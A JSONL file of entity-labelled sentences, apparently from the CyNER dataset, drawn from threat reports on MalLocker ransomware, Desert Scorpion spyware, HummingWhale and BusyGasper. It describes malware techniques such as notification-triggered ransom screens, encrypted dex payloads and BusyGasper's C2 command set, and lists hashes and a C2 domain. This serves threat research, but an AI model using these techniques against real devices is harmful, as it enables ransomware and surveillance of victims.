{"text": "Indicators of Compromise ( IoCs ) SHA256 Detection e394e53e53cd9047d6cff184ac333ef7698a34b777ae3aac82c2c669ef661dfe AndroidOS_SpyAgent.HRXB e8d4713e43241ab09d40c2ae8814302f77de76650ccf3e7db83b3ac8ad41f9fa AndroidOS_ProjectSpy.HRX 29b0d86ae68d83f9578c3f36041df943195bc55a7f3f1d45a9c23f145d75af9d", "spans": {}, "info": {"id": "cyner_train_000430", "source": "cyner_train"}}
{"text": "AndroidOS_ProjectSpy.HRX 3a15e7b8f4e35e006329811a6a2bf291d449884a120332f24c7e3ca58d0fbbdb IOS_ProjectSpy.A URLs cashnow [ .", "spans": {}, "info": {"id": "cyner_train_000431", "source": "cyner_train"}}
{"text": "] ee Backend server ftp [ .", "spans": {}, "info": {"id": "cyner_train_000432", "source": "cyner_train"}}
{"text": "] ee Backend server October 8 , 2020 Sophisticated new Android malware marks the latest evolution of mobile ransomware Attackers are persistent and motivated to continuously evolve – and no platform is immune .", "spans": {"SYSTEM: Android": [[55, 62]]}, "info": {"id": "cyner_train_000438", "source": "cyner_train"}}
{"text": "That is why Microsoft has been working to extend its industry-leading endpoint protection capabilities beyond Windows .", "spans": {"ORGANIZATION: Microsoft": [[12, 21]], "SYSTEM: Windows": [[110, 117]]}, "info": {"id": "cyner_train_000439", "source": "cyner_train"}}
{"text": "Microsoft ’ s mobile threat defense capabilities further enrich the visibility that organizations have on threats in their networks , as well as provide more tools to detect and respond to threats across domains and across platforms .", "spans": {"ORGANIZATION: Microsoft": [[0, 9]]}, "info": {"id": "cyner_train_000441", "source": "cyner_train"}}
{"text": "Like all of Microsoft ’ s security solutions , these new capabilities are likewise backed by a global network of threat researchers and security experts whose deep understanding of the threat landscape guide the continuous innovation of security features and ensure that customers are protected from ever-evolving threats .", "spans": {"ORGANIZATION: Microsoft": [[12, 21]]}, "info": {"id": "cyner_train_000442", "source": "cyner_train"}}
{"text": "For example , we found a piece of a particularly sophisticated Android ransomware with novel techniques and behavior , exemplifying the rapid evolution of mobile threats that we have also observed on other platforms .", "spans": {"SYSTEM: Android": [[63, 70]]}, "info": {"id": "cyner_train_000443", "source": "cyner_train"}}
{"text": "This ransomware family is known for being hosted on arbitrary websites and circulated on online forums using various social engineering lures , including masquerading as popular apps , cracked games , or video players .", "spans": {}, "info": {"id": "cyner_train_000445", "source": "cyner_train"}}
{"text": "Instead , it blocks access to devices by displaying a screen that appears over every other window , such that the user can ’ t do anything else .", "spans": {}, "info": {"id": "cyner_train_000448", "source": "cyner_train"}}
{"text": "What ’ s innovative about this ransomware is how it displays its ransom note .", "spans": {}, "info": {"id": "cyner_train_000450", "source": "cyner_train"}}
{"text": "New scheme , same goal In the past , Android ransomware used a special permission called “ SYSTEM_ALERT_WINDOW ” to display their ransom note .", "spans": {"SYSTEM: Android": [[37, 44]]}, "info": {"id": "cyner_train_000452", "source": "cyner_train"}}
{"text": "Apps that have this permission can draw a window that belongs to the system group and can ’ t be dismissed .", "spans": {}, "info": {"id": "cyner_train_000453", "source": "cyner_train"}}
{"text": "The notification was intended to be used for system alerts or errors , but Android threats misused it to force the attacker-controlled UI to fully occupy the screen , blocking access to the device .", "spans": {"SYSTEM: Android": [[75, 82]]}, "info": {"id": "cyner_train_000455", "source": "cyner_train"}}
{"text": "Attackers create this scenario to persuade users to pay the ransom so they can gain back access to the device .", "spans": {}, "info": {"id": "cyner_train_000456", "source": "cyner_train"}}
{"text": "To catch these threats , security solutions used heuristics that focused on detecting this behavior .", "spans": {}, "info": {"id": "cyner_train_000457", "source": "cyner_train"}}
{"text": "Google later implemented platform-level changes that practically eliminated this attack surface .", "spans": {"ORGANIZATION: Google": [[0, 6]]}, "info": {"id": "cyner_train_000458", "source": "cyner_train"}}
{"text": "These changes include : Removing the SYSTEM_ALERT_WINDOW error and alert window types , and introducing a few other types as replacement Elevating the permission status of SYSTEM_ALERT_WINDOW to special permission by putting it into the “ above dangerous ” category , which means that users have to go through many screens to approve apps that ask for permission , instead of just one click Introducing an overlay kill switch on Android 8.0 and later that users can activate anytime to deactivate a system alert window To adapt , Android malware evolved to misusing", "spans": {"SYSTEM: Android 8.0": [[429, 440]], "SYSTEM: Android": [[530, 537]]}, "info": {"id": "cyner_train_000459", "source": "cyner_train"}}
{"text": "other features , but these aren ’ t as effective .", "spans": {}, "info": {"id": "cyner_train_000460", "source": "cyner_train"}}
{"text": "Other ransomware families use infinite loops of drawing non-system windows , but in between drawing and redrawing , it ’ s possible for users to go to settings and uninstall the offending app .", "spans": {"SYSTEM: windows": [[67, 74]]}, "info": {"id": "cyner_train_000462", "source": "cyner_train"}}
{"text": "The new Android ransomware variant overcomes these barriers by evolving further than any Android malware we ’ ve seen before .", "spans": {"MALWARE: Android": [[8, 15], [89, 96]]}, "info": {"id": "cyner_train_000463", "source": "cyner_train"}}
{"text": "To surface its ransom note , it uses a series of techniques that take advantage of the following components on Android : The “ call ” notification , among several categories of notifications that Android supports , which requires immediate user attention .", "spans": {"SYSTEM: Android": [[111, 118], [196, 203]]}, "info": {"id": "cyner_train_000464", "source": "cyner_train"}}
{"text": "The “ onUserLeaveHint ( ) ” callback method of the Android Activity ( i.e. , the typical GUI screen the user sees ) is called as part of the activity lifecycle when the activity is about to go into the background as a result of user choice , for example , when the user presses the Home key .", "spans": {"SYSTEM: Android Activity": [[51, 67]]}, "info": {"id": "cyner_train_000465", "source": "cyner_train"}}
{"text": "The malware connects the dots and uses these two components to create a special type of notification that triggers the ransom screen via the callback .", "spans": {}, "info": {"id": "cyner_train_000466", "source": "cyner_train"}}
{"text": "As the code snippet shows , the malware creates a notification builder and then does the following : setCategory ( “ call ” ) – This means that the notification is built as a very important notification that needs special privilege .", "spans": {}, "info": {"id": "cyner_train_000467", "source": "cyner_train"}}
{"text": "At this stage , half the job is done for the malware .", "spans": {}, "info": {"id": "cyner_train_000469", "source": "cyner_train"}}
{"text": "Recall that the malware hooked the RansomActivity intent with the notification that was created as a “ call ” type notification .", "spans": {}, "info": {"id": "cyner_train_000472", "source": "cyner_train"}}
{"text": "This creates a chain of events that triggers the automatic pop-up of the ransomware screen without doing infinite redraw or posing as system window .", "spans": {}, "info": {"id": "cyner_train_000473", "source": "cyner_train"}}
{"text": "The knowledge graph below shows the various techniques this ransomware family has been seen using , including abusing the system alert window , abusing accessibility features , and , more recently , abusing notification services .", "spans": {}, "info": {"id": "cyner_train_000475", "source": "cyner_train"}}
{"text": "This ransomware family ’ s long history tells us that its evolution is far from over .", "spans": {}, "info": {"id": "cyner_train_000476", "source": "cyner_train"}}
{"text": "The frozen TinyML model is useful for making sure images fit the screen without distortion .", "spans": {"SYSTEM: TinyML": [[11, 17]]}, "info": {"id": "cyner_train_000479", "source": "cyner_train"}}
{"text": "In the case of this ransomware , using the model would ensure that its ransom note—typically fake police notice or explicit images supposedly found on the device—would appear less contrived and more believable , increasing the chances of the user paying for the ransom .", "spans": {}, "info": {"id": "cyner_train_000480", "source": "cyner_train"}}
{"text": "The library that uses tinyML is not yet wired to the malware ’ s functionalities , but its presence in the malware code indicates the intention to do so in future variants .", "spans": {"SYSTEM: tinyML": [[22, 28]]}, "info": {"id": "cyner_train_000481", "source": "cyner_train"}}
{"text": "This new mobile ransomware variant is an important discovery because the malware exhibits behaviors that have not been seen before and could open doors for other malware to follow .", "spans": {}, "info": {"id": "cyner_train_000484", "source": "cyner_train"}}
{"text": "It reinforces the need for comprehensive defense powered by broad visibility into attack surfaces as well as domain experts who track the threat landscape and uncover notable threats that might be hiding amidst massive threat data and signals .", "spans": {}, "info": {"id": "cyner_train_000485", "source": "cyner_train"}}
{"text": "It detects this ransomware ( AndroidOS/MalLocker.B ) , as well as other malicious apps and files using cloud-based protection powered by deep learning and heuristics , in addition to content-based detection .", "spans": {}, "info": {"id": "cyner_train_000487", "source": "cyner_train"}}
{"text": "Threat data from endpoints are combined with signals from email and data , identities , and apps in Microsoft 365 Defender ( previously Microsoft Threat Protection ) , which orchestrates detection , prevention , investigation , and response across domains , providing coordinated defense .", "spans": {"SYSTEM: Microsoft 365 Defender": [[100, 122]], "SYSTEM: Microsoft Threat Protection": [[136, 163]]}, "info": {"id": "cyner_train_000491", "source": "cyner_train"}}
{"text": "Microsoft Defender for Endpoint on Android further enriches organizations ’ visibility into malicious activity , empowering them to comprehensively prevent , detect , and respond to against attack sprawl and cross-domain incidents .", "spans": {"SYSTEM: Microsoft Defender": [[0, 18]], "SYSTEM: Android": [[35, 42]]}, "info": {"id": "cyner_train_000492", "source": "cyner_train"}}
{"text": "Technical analysis Obfuscation On top of recreating ransomware behavior in ways we haven ’ t seen before , the Android malware variant uses a new obfuscation technique unique to the Android platform .", "spans": {"SYSTEM: Android": [[111, 118], [182, 189]]}, "info": {"id": "cyner_train_000493", "source": "cyner_train"}}
{"text": "How does the malware work without code for these key components ?", "spans": {}, "info": {"id": "cyner_train_000496", "source": "cyner_train"}}
{"text": "As is characteristic for obfuscated threats , the malware has encrypted binary code stored in the Assets folder : When the malware runs for the first time , the static block of the main class is run .", "spans": {}, "info": {"id": "cyner_train_000497", "source": "cyner_train"}}
{"text": "On Android , an Intent is a software mechanism that allows users to coordinate the functions of different Activities to achieve a task .", "spans": {"SYSTEM: Android": [[3, 10]]}, "info": {"id": "cyner_train_000499", "source": "cyner_train"}}
{"text": "It ’ s a messaging object that can be used to request an action from another app component .", "spans": {}, "info": {"id": "cyner_train_000500", "source": "cyner_train"}}
{"text": "The Intent object carries a string value as “ action ” parameter .", "spans": {}, "info": {"id": "cyner_train_000501", "source": "cyner_train"}}
{"text": "It then decrypts a hardcoded encrypted value and sets the “ action ” parameter of the Intent using the setAction API .", "spans": {}, "info": {"id": "cyner_train_000503", "source": "cyner_train"}}
{"text": "Once this Intent object is generated with the action value pointing to the decrypted content , the decryption function returns the Intent object to the callee .", "spans": {}, "info": {"id": "cyner_train_000504", "source": "cyner_train"}}
{"text": "Payload deployment Once the static block execution is complete , the Android Lifecycle callback transfers the control to the OnCreate method of the main class .", "spans": {"SYSTEM: Android Lifecycle": [[69, 86]]}, "info": {"id": "cyner_train_000506", "source": "cyner_train"}}
{"text": "Malware code showing onCreate method Figure 9. onCreate method of the main class decrypting the payload Next , the malware-defined function decryptAssetToDex ( a meaningful name we assigned during analysis ) receives the string “ CuffGmrQRT ” as the first argument , which is the name of the encrypted file stored in the Assets folder .", "spans": {}, "info": {"id": "cyner_train_000507", "source": "cyner_train"}}
{"text": "This is a notable behavior that is characteristic of this ransomware family .", "spans": {}, "info": {"id": "cyner_train_000510", "source": "cyner_train"}}
{"text": "Comparison of code of Asset file before and after decryption Figure 11 .", "spans": {}, "info": {"id": "cyner_train_000511", "source": "cyner_train"}}
{"text": "Asset file before and after decryption Once the encrypted executable is decrypted and dropped in the storage , the malware has the definitions for all the components it declared in the manifest file .", "spans": {}, "info": {"id": "cyner_train_000512", "source": "cyner_train"}}
{"text": "It then starts the final detonator function to load the dropped .dex file into memory and triggers the main payload .", "spans": {}, "info": {"id": "cyner_train_000513", "source": "cyner_train"}}
{"text": "Malware code showing loading of decrypted dex file Figure 12 .", "spans": {}, "info": {"id": "cyner_train_000514", "source": "cyner_train"}}
{"text": "Loading the decrypted .dex file into memory and triggering the main payload Main payload When the main payload is loaded into memory , the initial detonator hands over the control to the main payload by invoking the method XoqF ( which we renamed to triggerInfection during analysis ) from the gvmthHtyN class ( renamed to PayloadEntry ) .", "spans": {}, "info": {"id": "cyner_train_000515", "source": "cyner_train"}}
{"text": "Malware code showing handover from initial module to main payload Figure 13 .", "spans": {}, "info": {"id": "cyner_train_000516", "source": "cyner_train"}}
{"text": "Handover from initial module to the main payload As mentioned , the initial handover component called triggerInfection with an instance of appObj and a method that returns the value for the variable config .", "spans": {}, "info": {"id": "cyner_train_000517", "source": "cyner_train"}}
{"text": "Definition of populateConfigMap , which loads the map with values Correlating the last two steps , one can observe that the malware payload receives the configuration for the following properties : number – The default number to be send to the server ( in case the number is not available from the device ) api – The API key url – The URL to be used in WebView to display on the ransom note The malware saves this configuration to the shared preferences of the app data and then it sets up all the Broadcast Receivers .", "spans": {}, "info": {"id": "cyner_train_000519", "source": "cyner_train"}}
{"text": "This action registers code components to get notified when certain system events happen .", "spans": {}, "info": {"id": "cyner_train_000520", "source": "cyner_train"}}
{"text": "Initializing the BroadcastReceiver against system events From this point on , the malware execution is driven by callback functions that are triggered on system events like connectivity change , unlocking the phone , elapsed time interval , and others .", "spans": {}, "info": {"id": "cyner_train_000523", "source": "cyner_train"}}
{"text": "Lookout researchers have identified a new , highly targeted surveillanceware family known as Desert Scorpion in the Google Play Store .", "spans": {"ORGANIZATION: Lookout": [[0, 7]], "MALWARE: Desert Scorpion": [[93, 108]], "SYSTEM: Google Play Store": [[116, 133]]}, "info": {"id": "cyner_train_000524", "source": "cyner_train"}}
{"text": "Lookout notified Google of the finding and Google removed the app immediately while also taking action on it in Google Play Protect .", "spans": {"ORGANIZATION: Lookout": [[0, 7]], "ORGANIZATION: Google": [[17, 23], [43, 49]], "SYSTEM: Google Play Protect": [[112, 131]]}, "info": {"id": "cyner_train_000525", "source": "cyner_train"}}
{"text": "The app ties together two malware families - Desert Scorpion and another targeted surveillanceware family named FrozenCell - that we believe are being developed by a single , evolving surveillanceware actor called APT-C-23 targeting individuals in the Middle East .", "spans": {"MALWARE: Desert Scorpion": [[45, 60]], "MALWARE: FrozenCell": [[112, 122]], "MALWARE: APT-C-23": [[214, 222]]}, "info": {"id": "cyner_train_000526", "source": "cyner_train"}}
{"text": "We 've seen this actor rely heavily on phishing campaigns to trick victims into downloading their malicious apps , specifically on Facebook .", "spans": {"SYSTEM: Facebook": [[131, 139]]}, "info": {"id": "cyner_train_000527", "source": "cyner_train"}}
{"text": "Even sophisticated actors are using lower cost , less technologically impressive means like phishing to spread their malware because it 's cheap and very effective , especially on mobile devices where there are more ways to interact with a victim ( messaging apps , social media apps , etc .", "spans": {}, "info": {"id": "cyner_train_000528", "source": "cyner_train"}}
{"text": ") , and less screen real estate for victims to identify potential indicators of a threat .", "spans": {}, "info": {"id": "cyner_train_000529", "source": "cyner_train"}}
{"text": "Lookout customers are protected against this threat and additionally we have included a list of IOCs at the end of this report .", "spans": {"ORGANIZATION: Lookout": [[0, 7]]}, "info": {"id": "cyner_train_000530", "source": "cyner_train"}}
{"text": "These factors , in combination with the fact that the command and control infrastructure used by Frozen Cell and Desert Scorpion resides in similar IP blocks , supports the theory that the same actor is responsible for operating , if not developing , both families .", "spans": {"MALWARE: Frozen Cell": [[97, 108]], "MALWARE: Desert Scorpion": [[113, 128]]}, "info": {"id": "cyner_train_000534", "source": "cyner_train"}}
{"text": "The chat application acts as a dropper for this second-stage payload app .", "spans": {}, "info": {"id": "cyner_train_000536", "source": "cyner_train"}}
{"text": "At the time of writing Lookout has observed two updates to the Dardesh application , the first on February 26 and the second on March 28 .", "spans": {"ORGANIZATION: Lookout": [[23, 30]], "MALWARE: Dardesh": [[63, 70]]}, "info": {"id": "cyner_train_000537", "source": "cyner_train"}}
{"text": "The malicious capabilities observed in the second stage include the following : Upload attacker-specified files to C2 servers Get list of installed applications Get device metadata Inspect itself to get a list of launchable activities Retrieves PDF , txt , doc , xls , xlsx , ppt , pptx files found on external storage Send SMS Retrieve text messages Track device location Handle limited attacker commands via out of band text messages Record surrounding audio Record calls Record video Retrieve account information such as email addresses Retrieve contacts Removes copies of itself if", "spans": {}, "info": {"id": "cyner_train_000538", "source": "cyner_train"}}
{"text": "any additional APKs are downloaded to external storage .", "spans": {}, "info": {"id": "cyner_train_000539", "source": "cyner_train"}}
{"text": "Call an attacker-specified number Uninstall apps Check if a device is rooted Hide its icon Retrieve list of files on external storage If running on a Huawei device it will attempt to add itself to the protected list of apps able to run with the screen off Encrypts some exfiltrated data Desert Scorpion 's second stage masquerades as a generic \" settings '' application .", "spans": {"MALWARE: Desert Scorpion": [[287, 302]]}, "info": {"id": "cyner_train_000540", "source": "cyner_train"}}
{"text": "Such references would be in line with FrozenCell 's phishing tactics in which they used file names to lure people associated with the political party to open malicious documents .", "spans": {"MALWARE: FrozenCell": [[38, 48]]}, "info": {"id": "cyner_train_000542", "source": "cyner_train"}}
{"text": "Desert Scorpion 's second stage is capable of installing another non-malicious application ( included in the second stage ) which is highly specific to the Fatah political party and supports the targeting theory .", "spans": {"MALWARE: Desert Scorpion": [[0, 15]], "ORGANIZATION: Fatah": [[156, 161]]}, "info": {"id": "cyner_train_000543", "source": "cyner_train"}}
{"text": "The Lookout Threat Intelligence team is increasingly seeing the same tradecraft , tactics , and procedures that APT-C-23 favors being used by other actors .", "spans": {"ORGANIZATION: Lookout Threat Intelligence": [[4, 31]], "MALWARE: APT-C-23": [[112, 120]]}, "info": {"id": "cyner_train_000544", "source": "cyner_train"}}
{"text": "The approach of separating malicious functionality out into separate stages that are later downloaded during execution and not present in the initial app published to the Google Play Store , combined with social engineering delivered via social media platforms like Facebook , requires minimal investment in comparison to premium tooling like Pegasus or FinFisher .", "spans": {"SYSTEM: Google Play Store": [[171, 188]], "ORGANIZATION: Facebook": [[266, 274]], "MALWARE: Pegasus": [[343, 350]], "MALWARE: FinFisher": [[354, 363]]}, "info": {"id": "cyner_train_000545", "source": "cyner_train"}}
{"text": "As we 've seen with actors like Dark Caracal , this low cost , low sophistication approach that relies heavily upon social engineering has still been shown to be highly successful for those operating such campaigns .", "spans": {"MALWARE: Dark Caracal": [[32, 44]]}, "info": {"id": "cyner_train_000546", "source": "cyner_train"}}
{"text": "Given previous operational security errors from this actor in the past which resulted in exfiltrated content being publicly accessible Lookout Threat Intelligence is continuing to map out infrastructure and closely monitor their continued evolution .", "spans": {"ORGANIZATION: Lookout Threat Intelligence": [[135, 162]]}, "info": {"id": "cyner_train_000547", "source": "cyner_train"}}
{"text": "Virulent Android malware returns , gets > 2 million downloads on Google Play HummingWhale is back with new tricks , including a way to gin user ratings .", "spans": {"MALWARE: Virulent": [[0, 8]], "SYSTEM: Android": [[9, 16]], "SYSTEM: Google Play": [[65, 76]], "MALWARE: HummingWhale": [[77, 89]]}, "info": {"id": "cyner_train_000548", "source": "cyner_train"}}
{"text": "DAN GOODIN - 1/23/2017 , 4:39 PM A virulent family of malware that infected more than 10 million Android devices last year has made a comeback , this time hiding inside Google Play apps that have been downloaded by as many as 12 million unsuspecting users .", "spans": {"MALWARE: virulent": [[35, 43]], "SYSTEM: Android": [[97, 104]], "SYSTEM: Google Play": [[169, 180]]}, "info": {"id": "cyner_train_000549", "source": "cyner_train"}}
{"text": "HummingBad attempted to override security protections by exploiting unpatched vulnerabilities that gave the malware root privileges in older versions of Android .", "spans": {"MALWARE: HummingBad": [[0, 10]], "VULNERABILITY: unpatched vulnerabilities": [[68, 93]], "SYSTEM: Android": [[153, 160]]}, "info": {"id": "cyner_train_000551", "source": "cyner_train"}}
{"text": "Before Google shut it down , it installed more than 50,000 fraudulent apps each day , displayed 20 million malicious advertisements , and generated more than $ 300,000 per month in revenue .", "spans": {"ORGANIZATION: Google": [[7, 13]]}, "info": {"id": "cyner_train_000552", "source": "cyner_train"}}
{"text": "HummingWhale , by contrast , managed to sneak its way into about 20 Google Play apps that were downloaded from 2 million to 12 million times , according to researchers from Check Point , the security company that has been closely following the malware family for almost a year .", "spans": {"MALWARE: HummingWhale": [[0, 12]], "SYSTEM: Google Play": [[68, 79]], "ORGANIZATION: Check Point": [[173, 184]]}, "info": {"id": "cyner_train_000554", "source": "cyner_train"}}
{"text": "\" This malware employs several tactics to keep its activity hidden , meaning users might be unaware of its existence on their device .", "spans": {}, "info": {"id": "cyner_train_000557", "source": "cyner_train"}}
{"text": "'' As was the case with HummingBad , the purpose of HummingWhale is to generate revenue by displaying fraudulent ads and automatically installing apps .", "spans": {"MALWARE: HummingBad": [[24, 34]], "MALWARE: HummingWhale": [[52, 64]]}, "info": {"id": "cyner_train_000558", "source": "cyner_train"}}
{"text": "When users try to close the ads , the new functionality causes already downloaded apps to run in a virtual machine .", "spans": {}, "info": {"id": "cyner_train_000559", "source": "cyner_train"}}
{"text": "That creates a fake ID that allows the perpetrators to generate referral revenues .", "spans": {}, "info": {"id": "cyner_train_000560", "source": "cyner_train"}}
{"text": "Advertisement The VM also disguises the malicious activity , making it easier for the apps to infiltrate Google Play .", "spans": {"SYSTEM: Google Play": [[105, 116]]}, "info": {"id": "cyner_train_000562", "source": "cyner_train"}}
{"text": "Until now , Android malware that wanted advanced capabilities typically had to trick users into approving sometimes scary-sounding permissions or exploit rooting vulnerabilities .", "spans": {"SYSTEM: Android": [[12, 19]]}, "info": {"id": "cyner_train_000564", "source": "cyner_train"}}
{"text": "Gooligan , a family of Android malware that came to light in November after it compromised more than 1 million Google accounts , contained similar abilities to tamper with Google Play ratings .", "spans": {"MALWARE: Gooligan": [[0, 8]], "SYSTEM: Android": [[23, 30]], "ORGANIZATION: Google": [[111, 117]], "SYSTEM: Google Play": [[172, 183]]}, "info": {"id": "cyner_train_000567", "source": "cyner_train"}}
{"text": "People who want to know if their Android devices are infected can download the Check Point app here .", "spans": {"SYSTEM: Android": [[33, 40]], "ORGANIZATION: Check Point": [[79, 90]]}, "info": {"id": "cyner_train_000568", "source": "cyner_train"}}
{"text": "A separate app from Check Point competitor Lookout also detects the threat as a variant of the Shedun malware family .", "spans": {"ORGANIZATION: Check Point": [[20, 31]], "ORGANIZATION: Lookout": [[43, 50]], "MALWARE: Shedun": [[95, 101]]}, "info": {"id": "cyner_train_000569", "source": "cyner_train"}}
{"text": "More technically inclined people can detect infections by seeing if a device connects to a control server located at app.blinkingcamera.com .", "spans": {}, "info": {"id": "cyner_train_000570", "source": "cyner_train"}}
{"text": "Package names for infected apps typically contain a common naming structure that includes com.XXXXXXXXX.camera , for example com.bird.sky.whale.camera ( app name : Whale Camera ) , com.color.rainbow.camera ( Rainbow Camera ) , and com.fishing.when.orangecamera ( Orange Camera ) .", "spans": {"SYSTEM: Whale Camera": [[164, 176]], "SYSTEM: Rainbow Camera": [[208, 222]], "SYSTEM: Orange Camera": [[263, 276]]}, "info": {"id": "cyner_train_000571", "source": "cyner_train"}}
{"text": "BusyGasper – the unfriendly spy 29 AUG 2018 In early 2018 our mobile intruder-detection technology was triggered by a suspicious Android sample that , as it turned out , belonged to an unknown spyware family .", "spans": {"MALWARE: BusyGasper": [[0, 10]], "SYSTEM: Android": [[129, 136]]}, "info": {"id": "cyner_train_000574", "source": "cyner_train"}}
{"text": "Further investigation showed that the malware , which we named BusyGasper , is not all that sophisticated , but demonstrates some unusual features for this type of threat .", "spans": {"MALWARE: BusyGasper": [[63, 73]]}, "info": {"id": "cyner_train_000575", "source": "cyner_train"}}
{"text": "From a technical point of view , the sample is a unique spy implant with stand-out features such as device sensors listeners , including motion detectors that have been implemented with a degree of originality .", "spans": {}, "info": {"id": "cyner_train_000576", "source": "cyner_train"}}
{"text": "As a modern Android spyware it is also capable of exfiltrating data from messaging applications ( WhatsApp , Viber , Facebook ) .", "spans": {"SYSTEM: WhatsApp": [[98, 106]], "SYSTEM: Viber": [[109, 114]], "SYSTEM: Facebook": [[117, 125]]}, "info": {"id": "cyner_train_000578", "source": "cyner_train"}}
{"text": "Moreover , BusyGasper boasts some keylogging tools – the malware processes every user tap , gathering its coordinates and calculating characters by matching given values with hardcoded ones .", "spans": {"MALWARE: BusyGasper": [[11, 21]]}, "info": {"id": "cyner_train_000579", "source": "cyner_train"}}
{"text": "The sample has a multicomponent structure and can download a payload or updates from its C & C server , which happens to be an FTP server belonging to the free Russian web hosting service Ucoz .", "spans": {}, "info": {"id": "cyner_train_000580", "source": "cyner_train"}}
{"text": "It is noteworthy that BusyGasper supports the IRC protocol which is rarely seen among Android malware .", "spans": {"MALWARE: BusyGasper": [[22, 32]], "SYSTEM: Android": [[86, 93]]}, "info": {"id": "cyner_train_000581", "source": "cyner_train"}}
{"text": "In addition , the malware can log in to the attacker ’ s email inbox , parse emails in a special folder for commands and save any payloads to a device from email attachments .", "spans": {}, "info": {"id": "cyner_train_000582", "source": "cyner_train"}}
{"text": "This particular operation has been active since approximately May 2016 up to the present time .", "spans": {}, "info": {"id": "cyner_train_000583", "source": "cyner_train"}}
{"text": "Intrigued , we continued our search and found more interesting clues that could reveal some detailed information about the owners of the infected devices .", "spans": {}, "info": {"id": "cyner_train_000587", "source": "cyner_train"}}
{"text": "As we know from the FTP dump analysis , there was a firmware component from ASUS firmware , indicating the attacker ’ s interest in ASUS devices , which explains the victim file name that mentions “ ASUS ” .", "spans": {"ORGANIZATION: ASUS": [[76, 80], [132, 136]]}, "info": {"id": "cyner_train_000589", "source": "cyner_train"}}
{"text": "Gathered file Type Description lock Text Implant log ldata sqlite3 Location data based on network ( cell_id ) gdata sqlite3 Location data based on GPS coordinates sdata sqlite3 SMS messages f.db sqlite3 Facebook messages v.db sqlite3 Viber messages w.db sqlite3 WhatsApp messages Among the other data gathered were SMS banking messages that revealed an account with a balance of more than US $ 10,000.But as far as we know , the attacker behind this campaign is not interested in stealing the victims ’ money", "spans": {"SYSTEM: Facebook": [[203, 211]], "SYSTEM: Viber": [[234, 239]], "SYSTEM: WhatsApp": [[262, 270]]}, "info": {"id": "cyner_train_000591", "source": "cyner_train"}}
{"text": "We found no similarities to commercial spyware products or to other known spyware variants , which suggests BusyGasper is self-developed and used by a single threat actor .", "spans": {"MALWARE: BusyGasper": [[108, 118]]}, "info": {"id": "cyner_train_000593", "source": "cyner_train"}}
{"text": "At the same time , the lack of encryption , use of a public FTP server and the low opsec level could indicate that less skilled attackers are behind the malware .", "spans": {}, "info": {"id": "cyner_train_000594", "source": "cyner_train"}}
{"text": "Technical details Here is the meta information for the observed samples , certificates and hardcoded version stamps : Certificate MD5 Module Version Serial Number : 0x76607c02 Issuer : CN=Ron Validity : from = Tue Aug 30 13:01:30 MSK 2016 to = Sat Aug 24 13:01:30 MSK 2041 Subject : CN=Ron 9e005144ea1a583531f86663a5f14607 1 – 18abe28730c53de6d9e4786c7765c3d8 2 2.0", "spans": {}, "info": {"id": "cyner_train_000595", "source": "cyner_train"}}
{"text": "Serial Number : 0x6a0d1fec Issuer : CN=Sun Validity : from = Mon May 16 17:42:40 MSK 2016 to = Fri May 10 17:42:40 MSK 2041 Subject : CN=Sun 9ffc350ef94ef840728564846f2802b0 2 v2.51sun 6c246bbb40b7c6e75c60a55c0da9e2f2 2 v2.96s 7c8a12e56e3e03938788b26b84b80bd6 2 v3.09s", "spans": {}, "info": {"id": "cyner_train_000596", "source": "cyner_train"}}
{"text": "bde7847487125084f9e03f2b6b05adc3 2 v3.12s 2560942bb50ee6e6f55afc495d238a12 2 v3.18s It ’ s interesting that the issuer “ Sun ” matches the “ Sun1 ” and “ Sun2 ” identifiers of infected devices from the FTP server , suggesting they may be test devices .", "spans": {}, "info": {"id": "cyner_train_000597", "source": "cyner_train"}}
{"text": "The analyzed implant has a complex structure , and for now we have observed two modules .", "spans": {}, "info": {"id": "cyner_train_000598", "source": "cyner_train"}}
{"text": "First ( start ) module The first module , which was installed on the targeted device , could be controlled over the IRC protocol and enable deployment of other components by downloading a payload from the FTP server : @ install command As can be seen from the screenshot above , a new component was copied in the system path , though that sort of operation is impossible without root privileges .", "spans": {}, "info": {"id": "cyner_train_000599", "source": "cyner_train"}}
{"text": "At the time of writing we had no evidence of an exploit being used to obtain root privileges , though it is possible that the attackers used some unseen component to implement this feature .", "spans": {}, "info": {"id": "cyner_train_000600", "source": "cyner_train"}}
{"text": "Here is a full list of possible commands that can be executed by the first module : Command name Description @ stop Stop IRC @ quit System.exit ( 0 ) @ start Start IRC @ server Set IRC server ( default value is “ irc.freenode.net ” ) , port is always 6667 @ boss Set IRC command and control nickname ( default value is “ ISeency ” ) @ nick Set IRC client nickname @ screen Report every time when screen is on ( enable/disable ) @ root Use root features ( enable/disable ) @ timer Set", "spans": {}, "info": {"id": "cyner_train_000601", "source": "cyner_train"}}
{"text": "period of IRCService start @ hide Hide implant icon @ unhide Unhide implant icon @ run Execute specified shell @ broadcast Send command to the second module @ echo Write specified message to log @ install Download and copy specified component to the system path The implant uses a complex intent-based communication mechanism between its components to broadcast commands : Approximate graph of relationships between BusyGasper components Second ( main ) module This module writes a log of the command execution history to the file named “ lock ” , which is later exfiltrated", "spans": {}, "info": {"id": "cyner_train_000602", "source": "cyner_train"}}
{"text": "A full list of all possible commands with descriptions can be found in Appendix II below .", "spans": {}, "info": {"id": "cyner_train_000607", "source": "cyner_train"}}
{"text": "The malware has all the popular capabilities of modern spyware .", "spans": {}, "info": {"id": "cyner_train_000608", "source": "cyner_train"}}
{"text": "Below is a description of the most noteworthy : The implant is able to spy on all available device sensors and to log registered events .", "spans": {}, "info": {"id": "cyner_train_000609", "source": "cyner_train"}}
{"text": "This allows it to silently execute any backdoor activity without the user knowing that the device is in an active state .", "spans": {}, "info": {"id": "cyner_train_000611", "source": "cyner_train"}}
{"text": "As soon as the user picks up the device , the implant will detect a motion event and execute the “ tk1 ” and “ input keyevent 3 ” commands .", "spans": {}, "info": {"id": "cyner_train_000612", "source": "cyner_train"}}
{"text": "“ tk1 ” will disable all the effects of the “ tk0 ” command , while “ input keyevent 3 ” is the shell command that simulates the pressing of the ‘ home ’ button so all the current activities will be minimized and the user won ’ t suspect anything .", "spans": {}, "info": {"id": "cyner_train_000613", "source": "cyner_train"}}
{"text": "The implant can log in to the attackers email inbox , parse emails for commands in a special “ Cmd ” folder and save any payloads to a device from email attachments .", "spans": {}, "info": {"id": "cyner_train_000615", "source": "cyner_train"}}
{"text": "Accessing the “ Cmd ” folder in the attacker ’ s email box Moreover , it can send a specified file or all the gathered data from the victim device via email .", "spans": {}, "info": {"id": "cyner_train_000616", "source": "cyner_train"}}
